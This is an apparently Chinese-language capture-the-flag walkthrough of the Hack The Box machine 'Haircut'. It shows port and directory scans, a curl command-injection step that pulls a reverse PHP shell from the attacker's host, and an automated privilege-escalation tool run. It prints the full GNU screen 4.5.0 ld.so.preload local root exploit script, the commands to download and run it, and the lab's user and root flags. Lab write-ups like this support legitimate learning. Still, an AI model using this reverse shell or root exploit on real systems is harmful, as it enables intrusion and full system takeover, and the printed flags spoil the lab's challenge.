[Meachines] [Medium] Haircut Curl命令注入+TRP00F自动化权限提升+Screen4.5.0权限提升
信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.24 | TCP:22,80 |
$ nmap -p- 10.10.10.24 --min-rate 1000 -sC -sV
ORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
| 256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_ 256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open http nginx 1.10.0 (Ubuntu)
|_http-title: HTB Hairdresser
|_http-server-header: nginx/1.10.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
目录爆破 & CURL 命令注入反向Web-Shell
$ gobuster dir --url http://10.10.10.24 --wordlist /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -t 50
http://10.10.16.24/reverse.php -o uploads/rev.php
$ curl http://10.10.10.24/uploads/rev.php
User.txt
983f69a3c242dad8de31036c64b13fdf
权限提升
TRP00F 自动化权限提升
$ python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10033 --pkhttpport 9090 --lxhttpport 9900
Screen4.5.0 权限提升
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){chown("/tmp/rootshell", 0, 0);chmod("/tmp/rootshell", 04755);unlink("/etc/ld.so.preload");printf("[+] done!\n");
}
EOF
export PATH=/usr/bin:$PATH
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){setuid(0);setgid(0);seteuid(0);setegid(0);execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
$ curl http://10.10.16.24/scr.sh -o /tmp/scr.sh; chmod +x /tmp/scr.sh
$ ./scr.sh
Root.txt
3ffde1490b04962112ab36628d2c4436